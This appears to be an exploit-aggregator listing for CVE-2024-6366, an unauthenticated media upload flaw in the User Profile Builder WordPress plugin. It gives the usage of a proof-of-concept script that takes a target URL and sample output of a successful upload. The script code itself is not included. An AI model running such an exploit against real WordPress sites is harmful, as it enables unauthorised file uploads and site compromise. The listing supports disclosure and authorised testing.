Exploit for CVE-2024-6366

Name: Exploit for CVE-2024-6366
Rating: 5 (137 reviews)
2025-02-02 | CVSS 9.1
## https://sploitus.com/exploit?id=1B3C3485-4096-57B5-B45C-369A6E7F70B1
# CVE-2024-6366-PoC
User Profile Builder &lt;= 3.11.7 - Unauthenticated Media Upload

# Description
The User Profile Builder WordPress plugin before 3.11.8 does not have proper authorisation, allowing unauthenticated users to upload media files via the async upload functionality of WP.

## Usage:

```
usage: CVE-2024-6366.py [-h] -u URL

The User Profile Builder WordPress plugin before 3.11.8 does not have proper authorisation,
 allowing unauthenticated users to upload media files via the async upload functionality of WP.

options:
  -h, --help         show this help message and exit
  -u URL, --url URL  The target URL (e.g., http://example.com)
```

### result

```
Extracted URL from the response:
http:\/\/192.168.100.74:888\/wordpress\/wp-content\/uploads\/2025\/02\/Nxploit-8.png
```

### Disclaimer
This script is intended for educational purposes and authorized security assessments only. Misuse of this script may result in legal consequences. Always obtain proper authorization before testing on any system.